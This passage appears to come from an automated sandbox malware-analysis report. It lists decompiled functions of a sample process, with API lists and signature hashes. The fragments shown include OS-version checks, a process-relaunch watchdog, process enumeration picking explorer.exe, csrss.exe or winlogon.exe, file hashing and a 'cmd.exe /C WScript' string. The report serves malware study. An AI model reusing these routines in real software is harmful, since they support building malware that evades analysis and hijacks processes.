                                                                                                        0x00406ced
                                                                                                        0x00406d15
                                                                                                        0x00406d1d
                                                                                                        0x00406d29
                                                                                                        0x00406d32
                                                                                                        0x00406d3b
                                                                                                        0x00406d3b
                                                                                                        0x00406d20

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseExitHandleThread$CreateProcess
                                                                                                        • String ID: cmd.exe /C WScript "
                                                                                                        • API String ID: 3397019416-3599441821
                                                                                                        • Opcode ID: 684bdaeb806f3df040d5c7cfd2e69662539794e42a811bb9b384c79524ea307f
                                                                                                        • Instruction ID: eef6df8135acf94fe22a1234d31cd8a2743a9bcf06af6411463f708c953a90e9
                                                                                                        • Opcode Fuzzy Hash: 684bdaeb806f3df040d5c7cfd2e69662539794e42a811bb9b384c79524ea307f
                                                                                                        • Instruction Fuzzy Hash: 05111BB1A40319BAEB10ABE0CE4AF9E777CAF15700F500176B305B50E2E779AA54CB5D
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00408270, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 24libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 58%
                                                                                                        			E00408270(void* __ecx, char _a4) {
				char _v8;
				_Unknown_base(*)()* _t6;
				void* _t8;

				_v8 = 0;
				_t6 = GetProcAddress(GetModuleHandleW(L"kernel32"), "IsWow64Process");
				if(_t6 == 0) {
					L3:
					return _v8;
				} else {
					_t3 =  &_a4; // 0x403432
					_t8 =  *_t6( *_t3,  &_v8);
					if(_t8 != 0) {
						goto L3;
					} else {
						return _t8;
					}
				}
			}






                                                                                                        0x0040827e
                                                                                                        0x0040828c
                                                                                                        0x00408294
                                                                                                        0x004082a7
                                                                                                        0x004082ad
                                                                                                        0x00408296
                                                                                                        0x0040829a
                                                                                                        0x0040829d
                                                                                                        0x004082a1
                                                                                                        0x00000000
                                                                                                        0x004082a6
                                                                                                        0x004082a6
                                                                                                        0x004082a6
                                                                                                        0x004082a1

                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,00403432), ref: 00408285
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0040828C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                        • String ID: 24@$IsWow64Process$kernel32
                                                                                                        • API String ID: 1646373207-2506754407
                                                                                                        • Opcode ID: 1784de0c5810e25c16468953f65073bf0f366bd13a04a3200ad938df08ff7324
                                                                                                        • Instruction ID: 4e0a41bddc85eb87f205be8107a504d095728719a775a610ae93757d078e0763
                                                                                                        • Opcode Fuzzy Hash: 1784de0c5810e25c16468953f65073bf0f366bd13a04a3200ad938df08ff7324
                                                                                                        • Instruction Fuzzy Hash: 6CE04F71644309ABDB10DBD0DE09B6E77ACDF41345F1441EDB808A2290EA799E109659
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004016A0, Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 21memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E004016A0(void* _a4, char _a8) {
				long _t5;
				long _t9;

				_t1 =  &_a8; // 0x404d23
				_t5 = HeapReAlloc(GetProcessHeap(), 0, _a4,  *_t1);
				_t9 = _t5;
				if(_t9 == 0) {
					HeapFree(GetProcessHeap(), _t5, _a4);
					return _t9;
				}
				return _t5;
			}





                                                                                                        0x004016a4
                                                                                                        0x004016b3
                                                                                                        0x004016b9
                                                                                                        0x004016bd
                                                                                                        0x004016ca
                                                                                                        0x00000000
                                                                                                        0x004016d0
                                                                                                        0x004016d4

                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,#M@,00000000,?,00404D23,00000000,00000000), ref: 004016AC
                                                                                                        • HeapReAlloc.KERNEL32(00000000,?,00404D23,00000000,00000000), ref: 004016B3
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00404D23,00000000,00000000), ref: 004016C3
                                                                                                        • HeapFree.KERNEL32(00000000,?,00404D23,00000000,00000000), ref: 004016CA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heap$Process$AllocFree
                                                                                                        • String ID: #M@
                                                                                                        • API String ID: 756756679-4131475827
                                                                                                        • Opcode ID: fc61fb002829f62c73740841c358f8d549b4fe25cca030ce621caa1704b7f87d
                                                                                                        • Instruction ID: ff7cb380345909262a6c5e90b85417ef13bbf769aef9ce5e450cfb0b8575ba0d
                                                                                                        • Opcode Fuzzy Hash: fc61fb002829f62c73740841c358f8d549b4fe25cca030ce621caa1704b7f87d
                                                                                                        • Instruction Fuzzy Hash: 24E0EC36900214BBCF111FE5AD1CA9A3F2DEB087A2F048424FB0DE6221C635CD20DB98
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00408CE0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 58%
                                                                                                        			E00408CE0() {
				_Unknown_base(*)()* _t2;
				signed int _t3;
				signed int _t5;
				void* _t9;

				 *0x5d2e0c = 0x11c;
				_t2 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlGetVersion");
				if(_t2 != 0) {
					 *_t2(0x5d2e0c);
				}
				_t3 =  *0x5d2e10; // 0xa
				if(_t3 == 0) {
					L22:
					return _t3;
				} else {
					_t5 = _t3 << 0x00000008 |  *0x5d2e14;
					_t9 = _t5 - 0x602;
					if(_t9 > 0) {
						if(_t5 == 0x603) {
							 *0x5d2e08 = 4;
							return _t5;
						}
						if(_t5 == 0xa00) {
							_t3 =  *0x5d2e18; // 0x42ee
							if(_t3 < 0x3fab) {
								if(_t3 < 0x3ad7) {
									if(_t3 < 0x3839) {
										if(_t3 < 0x295a) {
											goto L22;
										} else {
											 *0x5d2e08 = 5;
											return _t3;
										}
									} else {
										 *0x5d2e08 = 6;
										return _t3;
									}
								} else {
									 *0x5d2e08 = 7;
									return _t3;
								}
							} else {
								 *0x5d2e08 = 8;
								return _t3;
							}
						} else {
							goto L12;
						}
					} else {
						if(_t9 == 0) {
							 *0x5d2e08 = 3;
							return _t5;
						} else {
							if(_t5 == 0x501) {
								 *0x5d2e08 = 1;
								return _t5;
							} else {
								if(_t5 != 0x601) {
									L12:
									 *0x5d2e08 = 0;
									return _t5;
								} else {
									 *0x5d2e08 = 2;
									return _t5;
								}
							}
						}
					}
				}
			}







                                                                                                        0x00408cea
                                                                                                        0x00408cfb
                                                                                                        0x00408d03
                                                                                                        0x00408d0a
                                                                                                        0x00408d0a
                                                                                                        0x00408d0c
                                                                                                        0x00408d13
                                                                                                        0x00408dca
                                                                                                        0x00408dca
                                                                                                        0x00408d19
                                                                                                        0x00408d1c
                                                                                                        0x00408d22
                                                                                                        0x00408d27
                                                                                                        0x00408d5f
                                                                                                        0x00408dc0
                                                                                                        0x00000000
                                                                                                        0x00408dc0
                                                                                                        0x00408d66
                                                                                                        0x00408d73
                                                                                                        0x00408d7d
                                                                                                        0x00408d8f
                                                                                                        0x00408da1
                                                                                                        0x00408db3
                                                                                                        0x00000000
                                                                                                        0x00408db5
                                                                                                        0x00408db5
                                                                                                        0x00408dbf
                                                                                                        0x00408dbf
                                                                                                        0x00408da3
                                                                                                        0x00408da3
                                                                                                        0x00408dad
                                                                                                        0x00408dad
                                                                                                        0x00408d91
                                                                                                        0x00408d91
                                                                                                        0x00408d9b
                                                                                                        0x00408d9b
                                                                                                        0x00408d7f
                                                                                                        0x00408d7f
                                                                                                        0x00408d89
                                                                                                        0x00408d89
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00408d29
                                                                                                        0x00408d29
                                                                                                        0x00408d4f
                                                                                                        0x00408d59
                                                                                                        0x00408d2b
                                                                                                        0x00408d30
                                                                                                        0x00408d44
                                                                                                        0x00408d4e
                                                                                                        0x00408d32
                                                                                                        0x00408d37
                                                                                                        0x00408d68
                                                                                                        0x00408d68
                                                                                                        0x00408d72
                                                                                                        0x00408d39
                                                                                                        0x00408d39
                                                                                                        0x00408d43
                                                                                                        0x00408d43
                                                                                                        0x00408d37
                                                                                                        0x00408d30
                                                                                                        0x00408d29
                                                                                                        0x00408d27

                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlGetVersion,00408DD5,00403448), ref: 00408CF4
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00408CFB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                        • String ID: RtlGetVersion$ntdll.dll
                                                                                                        • API String ID: 1646373207-1489217083
                                                                                                        • Opcode ID: 7285d3ab72aa9700bc586f94e958407b6898de8486acee8395e58182b358e7c1
                                                                                                        • Instruction ID: 26c57fc426f1e3111cd77027b938fa7e90139beecd20d4fae7029aa442a0f424
                                                                                                        • Opcode Fuzzy Hash: 7285d3ab72aa9700bc586f94e958407b6898de8486acee8395e58182b358e7c1
                                                                                                        • Instruction Fuzzy Hash: 09110D751112008BEB25CF10DF9872A3799EB71700FA8497BD040E52E0CBFC85D9EA4A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00408B00, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00408B00(CHAR* _a4) {
				struct HINSTANCE__* _t3;

				_t1 =  &_a4; // 0x402b26
				_t3 = GetModuleHandleA( *_t1);
				if(_t3 == 0) {
					return LoadLibraryA(_a4);
				}
				return _t3;
			}




                                                                                                        0x00408b03
                                                                                                        0x00408b06
                                                                                                        0x00408b0e
                                                                                                        0x00000000
                                                                                                        0x00408b13
                                                                                                        0x00408b1a

                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(&+@,?,00402B26,?), ref: 00408B06
                                                                                                        • LoadLibraryA.KERNEL32(00000000,?,00402B26,?), ref: 00408B13
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: HandleLibraryLoadModule
                                                                                                        • String ID: &+@
                                                                                                        • API String ID: 4133054770-3274530745
                                                                                                        • Opcode ID: a2c9844b3c19bb96194046df9ca848ceace1c6f359e83cde6a5973935ba7ed72
                                                                                                        • Instruction ID: 6061ff5d45b2c9477c6e6c8a5bdf30d78efc3d99e478dc08a0e6e8702b224e8b
                                                                                                        • Opcode Fuzzy Hash: a2c9844b3c19bb96194046df9ca848ceace1c6f359e83cde6a5973935ba7ed72
                                                                                                        • Instruction Fuzzy Hash: 37C04C70100148EBDF011F62ED089993F6DEB416957408035F84DA4132DB369D519A98
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Analysis Process: oQOWFbKllEKo.exe PID: 3440 Parent PID: 5932 oQOWFbKllEKo.exeCOMMON

                                                                                                        Executed Functions

                                                                                                        Function 01468390, Relevance: 13.6, APIs: 9, Instructions: 65threadsleepprocessCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 85%
                                                                                                        			E01468390(long* _a4) {
				long _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				int _t17;
				void* _t35;

				_t35 = OpenProcess(0x1000, 0,  *_a4);
				if(_t35 == 0) {
					ExitThread(0);
				}
				while(1) {
					_v8 = 0;
					_t17 = GetExitCodeProcess(_t35,  &_v8); // executed
					if(_t17 == 0 || (0 | _v8 == 0x00000103) == 0) {
						break;
					}
					Sleep(0x7d0); // executed
				}
				CloseHandle(_t35);
				E01461BB0( &_v92, 0, 0x44);
				asm("xorps xmm0, xmm0");
				asm("movups [ebp-0x14], xmm0");
				CreateProcessW( &(_a4[1]), 0, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
				CloseHandle(_v24.hThread);
				CloseHandle(_v24);
				ExitThread(_v24.dwProcessId);
			}








                                                                                                        0x014683ab
                                                                                                        0x014683af
                                                                                                        0x01468447
                                                                                                        0x01468447
                                                                                                        0x014683c1
                                                                                                        0x014683c4
                                                                                                        0x014683cd
                                                                                                        0x014683d1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x014683e8
                                                                                                        0x014683e8
                                                                                                        0x014683f3
                                                                                                        0x014683fd
                                                                                                        0x01468408
                                                                                                        0x0146840b
                                                                                                        0x0146842c
                                                                                                        0x01468435
                                                                                                        0x0146843a
                                                                                                        0x0146843f

                                                                                                        APIs
                                                                                                        • OpenProcess.KERNEL32(00001000,00000000,?), ref: 014683A5
                                                                                                        • GetExitCodeProcess.KERNEL32(00000000,?), ref: 014683CD
                                                                                                        • Sleep.KERNEL32(000007D0), ref: 014683E8
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 014683F3
                                                                                                        • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0146842C
                                                                                                        • CloseHandle.KERNEL32(?), ref: 01468435
                                                                                                        • CloseHandle.KERNEL32(?), ref: 0146843A
                                                                                                        • ExitThread.KERNEL32 ref: 0146843F
                                                                                                        • ExitThread.KERNEL32 ref: 01468447
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseExitHandleProcess$Thread$CodeCreateOpenSleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 1465093181-0
                                                                                                        • Opcode ID: 11a558fac7276a8d4e2171a970d3cff2b76e97a5d24576860e6d5a0cb1c6ba0f
                                                                                                        • Instruction ID: fee7433a716275ab5919e0dda7cd2252fcba79b456ec3756e6cf3670147eda0b
                                                                                                        • Opcode Fuzzy Hash: 11a558fac7276a8d4e2171a970d3cff2b76e97a5d24576860e6d5a0cb1c6ba0f
                                                                                                        • Instruction Fuzzy Hash: E8114271940319BFEB219BA4DD49F9E7B7CAF04749F140011F604B61E4D6B0AA44CB96
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        Function 014680E0, Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 130libraryprocessloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 84%
                                                                                                        			E014680E0(void* __ebx, void* __edi, void* __esi, char _a4, intOrPtr* _a8, intOrPtr _a12) {
				void* _v8;
				struct HINSTANCE__* _v12;
				char _v272;
				intOrPtr _v300;
				void* _v308;
				struct HINSTANCE__* _t31;
				void* _t34;
				struct HINSTANCE__* _t39;
				void* _t49;
				void* _t51;
				void* _t55;
				void* _t57;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr* _t66;
				signed int _t69;
				void* _t72;

				if(_a4 == 0) {
					return E01467EF0("explorer.exe");
				} else {
					_t69 = 0;
					_v308 = 0x128;
					_a4 = 0;
					_t61 = CreateToolhelp32Snapshot(2, 0);
					_v8 = _t61;
					if(_t61 != 0xffffffff) {
						_t66 = 0;
						_t31 = LoadLibraryA("kernel32.dll");
						_v12 = _t31;
						if(_t31 != 0) {
							_t66 = GetProcAddress(_t31, "ProcessIdToSessionId");
						}
						Process32First(_t61,  &_v308);
						_t34 = E01468DD0();
						_t62 = _a8;
						if(_t34 == 0 || _t66 == 0) {
							L10:
							_t69 = 1;
							 *_t62 = _v300;
						} else {
							 *_t66(_v300,  &_a4);
							if(_a4 != _t69) {
								_t55 = E01461740("csrss.exe",  &_v272);
								_t72 = _t72 + 8;
								if(_t55 != 0) {
									_t57 = E01461740("winlogon.exe",  &_v272);
									_t72 = _t72 + 8;
									if(_t57 != 0) {
										goto L10;
									}
								}
							}
						}
						while(Process32Next(_v8,  &_v308) != 0) {
							if(E01468DD0() == 0 || _t66 == 0) {
								L18:
								 *((intOrPtr*)(_t62 + _t69 * 4)) = _v300;
								_t69 = _t69 + 1;
								if(_t69 < _a12) {
									goto L19;
								}
							} else {
								 *_t66(_v300,  &_a4);
								if(_a4 == 0) {
									goto L19;
								} else {
									_t49 = E01461740("csrss.exe",  &_v272);
									_t72 = _t72 + 8;
									if(_t49 == 0) {
										goto L19;
									} else {
										_t51 = E01461740("winlogon.exe",  &_v272);
										_t72 = _t72 + 8;
										if(_t51 == 0) {
											goto L19;
										} else {
											goto L18;
										}
									}
								}
							}
							goto L20;
							L19:
						}
						L20:
						CloseHandle(_v8);
						_t39 = _v12;
						if(_t39 != 0) {
							FreeLibrary(_t39);
						}
						return _t69;
					} else {
						return 0;
					}
				}
			}




















                                                                                                        0x014680ed
                                                                                                        0x01468261
                                                                                                        0x014680f3
                                                                                                        0x014680f5
                                                                                                        0x014680f7
                                                                                                        0x01468104
                                                                                                        0x0146810c
                                                                                                        0x0146810e
                                                                                                        0x01468114
                                                                                                        0x01468124
                                                                                                        0x01468126
                                                                                                        0x0146812c
                                                                                                        0x01468131
                                                                                                        0x0146813f
                                                                                                        0x0146813f
                                                                                                        0x01468149
                                                                                                        0x0146814e
                                                                                                        0x01468153
                                                                                                        0x01468158
                                                                                                        0x0146819f
                                                                                                        0x014681a5
                                                                                                        0x014681aa
                                                                                                        0x0146815e
                                                                                                        0x01468168
                                                                                                        0x0146816d
                                                                                                        0x0146817b
                                                                                                        0x01468180
                                                                                                        0x01468185
                                                                                                        0x01468193
                                                                                                        0x01468198
                                                                                                        0x0146819d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0146819d
                                                                                                        0x01468185
                                                                                                        0x0146816d
                                                                                                        0x014681bd
                                                                                                        0x014681c7
                                                                                                        0x0146820f
                                                                                                        0x01468215
                                                                                                        0x01468218
                                                                                                        0x0146821c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x014681cd
                                                                                                        0x014681d7
                                                                                                        0x014681dd
                                                                                                        0x00000000
                                                                                                        0x014681df
                                                                                                        0x014681eb
                                                                                                        0x014681f0
                                                                                                        0x014681f5
                                                                                                        0x00000000
                                                                                                        0x014681f7
                                                                                                        0x01468203
                                                                                                        0x01468208
                                                                                                        0x0146820d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0146820d
                                                                                                        0x014681f5
                                                                                                        0x014681dd
                                                                                                        0x00000000
                                                                                                        0x0146821e
                                                                                                        0x0146822d
                                                                                                        0x01468231
                                                                                                        0x01468234
                                                                                                        0x0146823a
                                                                                                        0x01468240
                                                                                                        0x01468243
                                                                                                        0x01468243
                                                                                                        0x01468250
                                                                                                        0x01468116
                                                                                                        0x0146811d
                                                                                                        0x0146811d
                                                                                                        0x01468114

                                                                                                        APIs
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,7519F7F0,00000000), ref: 01468107
                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,014667D1,00000002,00000000,7519F7F0,00000000), ref: 01468126
                                                                                                        • GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 01468139
                                                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 01468149
                                                                                                        • Process32Next.KERNEL32(00001000,00000128,00000000,00000128), ref: 014681B6
                                                                                                        • Process32Next.KERNEL32(00001000,00000128,00001000,00000128,00000000,00000128), ref: 01468228
                                                                                                        • CloseHandle.KERNEL32(00001000,00001000,00000128,00000000,00000128), ref: 01468234
                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 01468243
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process32$LibraryNext$AddressCloseCreateFirstFreeHandleLoadProcSnapshotToolhelp32
                                                                                                        • String ID: ProcessIdToSessionId$csrss.exe$csrss.exe$explorer.exe$kernel32.dll$winlogon.exe$winlogon.exe
                                                                                                        • API String ID: 2254598907-4289567422
                                                                                                        • Opcode ID: 75e54585ab597881e2a8c14eaa3f56565938607f13dac17787e80b533d592846
                                                                                                        • Instruction ID: 6426e4b32cada91637845f6a95382c694a5ca80f23e0158a4b6997380e6871cb
                                                                                                        • Opcode Fuzzy Hash: 75e54585ab597881e2a8c14eaa3f56565938607f13dac17787e80b533d592846
                                                                                                        • Instruction Fuzzy Hash: D641B97590031AABEF11AF65DC41BEA7BACAF6435DF1400ABED04D2260E771CA54CB93
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01468B20, Relevance: 24.2, APIs: 16, Instructions: 152encryptionfileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 34%
                                                                                                        			E01468B20(WCHAR* _a4, intOrPtr _a8) {
				long* _v8;
				int _v12;
				long _v16;
				int _v20;
				char _v24;
				char _v56;
				void _v1080;
				char _t39;
				long** _t42;
				int* _t43;
				int _t46;
				char* _t51;
				void* _t60;
				intOrPtr* _t69;
				int _t70;
				long _t72;
				signed int _t73;
				signed int _t75;
				intOrPtr _t80;
				void* _t82;
				void* _t87;

				asm("movups xmm0, [0x146aa14]");
				_t39 =  *0x146aa24; // 0x0
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				asm("movups [ebp-0x24], xmm0");
				_v24 = _t39;
				_t82 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x8000000, 0);
				if(_t82 == 0xffffffff) {
					L3:
					return 0;
				} else {
					_t42 =  &_v8;
					__imp__CryptAcquireContextW(_t42, 0, 0, 1, 0xf0000000);
					if(_t42 != 0) {
						_t43 =  &_v12;
						__imp__CryptCreateHash(_v8, 0x8003, 0, 0, _t43);
						if(_t43 != 0) {
							_t46 = ReadFile(_t82,  &_v1080, 0x400,  &_v16, 0);
							if(_t46 == 0) {
								L11:
								_push(0);
								goto L12;
							} else {
								_t69 = __imp__CryptHashData;
								while(1) {
									_t72 = _v16;
									if(_t72 == 0) {
										break;
									}
									_t60 =  *_t69(_v12,  &_v1080, _t72, 0);
									_push(0);
									if(_t60 == 0) {
										L12:
										CryptReleaseContext(_v8);
										__imp__CryptDestroyHash(_v12);
										CloseHandle(_t82);
										L13:
										return 0;
									} else {
										_t46 = ReadFile(_t82,  &_v1080, 0x400,  &_v16, ??);
										if(_t46 != 0) {
											continue;
										} else {
											goto L11;
										}
									}
									goto L20;
								}
								if(_t46 == 0) {
									goto L11;
								} else {
									_v20 = 0x10;
									_t51 =  &_v56;
									__imp__CryptGetHashParam(_v12, 2, _t51,  &_v20, 0);
									if(_t51 == 0) {
										goto L13;
									} else {
										_t70 = _v20;
										_t75 = 0;
										if(_t70 != 0) {
											_t80 = _a8;
											asm("o16 nop [eax+eax]");
											do {
												_t73 =  *(_t87 + _t75 - 0x34) & 0x000000ff;
												 *((char*)(_t80 + _t75 * 2)) =  *(_t87 + (_t73 >> 4) - 0x24) & 0x000000ff;
												 *((char*)(_t80 + 1 + _t75 * 2)) =  *(_t87 + (_t73 & 0x0000000f) - 0x24) & 0x000000ff;
												_t75 = _t75 + 1;
											} while (_t75 < _t70);
										}
										__imp__CryptDestroyHash(_v12);
										CryptReleaseContext(_v8, 0);
										CloseHandle(_t82);
										return 1;
									}
								}
							}
						} else {
							CloseHandle(_t82);
							CryptReleaseContext(_v8, 0);
							return 0;
						}
					} else {
						CloseHandle(_t82);
						goto L3;
					}
				}
				L20:
			}
























                                                                                                        0x01468b29
                                                                                                        0x01468b30
                                                                                                        0x01468b4b
                                                                                                        0x01468b52
                                                                                                        0x01468b59
                                                                                                        0x01468b60
                                                                                                        0x01468b67
                                                                                                        0x01468b6b
                                                                                                        0x01468b74
                                                                                                        0x01468b79
                                                                                                        0x01468b9b
                                                                                                        0x01468ba1
                                                                                                        0x01468b7b
                                                                                                        0x01468b86
                                                                                                        0x01468b8a
                                                                                                        0x01468b92
                                                                                                        0x01468ba2
                                                                                                        0x01468bb2
                                                                                                        0x01468bba
                                                                                                        0x01468bf0
                                                                                                        0x01468bf4
                                                                                                        0x01468c33
                                                                                                        0x01468c33
                                                                                                        0x00000000
                                                                                                        0x01468bf6
                                                                                                        0x01468bf6
                                                                                                        0x01468c00
                                                                                                        0x01468c00
                                                                                                        0x01468c05
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01468c14
                                                                                                        0x01468c16
                                                                                                        0x01468c1a
                                                                                                        0x01468c35
                                                                                                        0x01468c38
                                                                                                        0x01468c41
                                                                                                        0x01468c48
                                                                                                        0x01468c4e
                                                                                                        0x01468c56
                                                                                                        0x01468c1c
                                                                                                        0x01468c2d
                                                                                                        0x01468c31
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01468c31
                                                                                                        0x00000000
                                                                                                        0x01468c1a
                                                                                                        0x01468c59
                                                                                                        0x00000000
                                                                                                        0x01468c5b
                                                                                                        0x01468c60
                                                                                                        0x01468c68
                                                                                                        0x01468c71
                                                                                                        0x01468c79
                                                                                                        0x00000000
                                                                                                        0x01468c7b
                                                                                                        0x01468c7b
                                                                                                        0x01468c7e
                                                                                                        0x01468c82
                                                                                                        0x01468c84
                                                                                                        0x01468c87
                                                                                                        0x01468c90
                                                                                                        0x01468c90
                                                                                                        0x01468ca2
                                                                                                        0x01468caa
                                                                                                        0x01468cae
                                                                                                        0x01468caf
                                                                                                        0x01468c90
                                                                                                        0x01468cb6
                                                                                                        0x01468cc1
                                                                                                        0x01468cc8
                                                                                                        0x01468cd9
                                                                                                        0x01468cd9
                                                                                                        0x01468c79
                                                                                                        0x01468c59
                                                                                                        0x01468bbc
                                                                                                        0x01468bbd
                                                                                                        0x01468bc8
                                                                                                        0x01468bd4
                                                                                                        0x01468bd4
                                                                                                        0x01468b94
                                                                                                        0x01468b95
                                                                                                        0x00000000
                                                                                                        0x01468b95
                                                                                                        0x01468b92
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(0146363E,80000000,00000001,00000000,00000003,08000000,00000000), ref: 01468B6E
                                                                                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000), ref: 01468B8A
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 01468B95
                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 01468BB2
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 01468BBD
                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 01468BC8
                                                                                                        • ReadFile.KERNEL32(00000000,?,00000400,00000000,00000000,?,00000000), ref: 01468BF0
                                                                                                        • CryptHashData.ADVAPI32(00000000,?,00000000,00000000,?,00000000), ref: 01468C14
                                                                                                        • ReadFile.KERNEL32(00000000,?,00000400,00000000,00000000,?,00000000), ref: 01468C2D
                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000,?,00000000), ref: 01468C38
                                                                                                        • CryptDestroyHash.ADVAPI32(00000000,?,00000000), ref: 01468C41
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 01468C48
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,?,00000000,00000000,?,00000000), ref: 01468C71
                                                                                                        • CryptDestroyHash.ADVAPI32(00000000,?,00000000), ref: 01468CB6
                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000,?,00000000), ref: 01468CC1
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 01468CC8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$Hash$CloseContextHandle$FileRelease$CreateDestroyRead$AcquireDataParam
                                                                                                        • String ID:
                                                                                                        • API String ID: 2794010843-0
                                                                                                        • Opcode ID: c16684ed658cbe0f33a50d58310178249e99d8258054f4fb7f108588035e333c
                                                                                                        • Instruction ID: c07523fc0bf3e764f29e3ec9912ee4ecdb6971eea2a9947f96e62cfe4e95853c
                                                                                                        • Opcode Fuzzy Hash: c16684ed658cbe0f33a50d58310178249e99d8258054f4fb7f108588035e333c
                                                                                                        • Instruction Fuzzy Hash: 3E51B471A01219BFEB218FA4DD45FEE7BBCEF04708F100066FA04E61A4D7B15A458B66
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01464470, Relevance: 79.2, APIs: 28, Strings: 17, Instructions: 457synchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 93%
                                                                                                        			_entry_() {
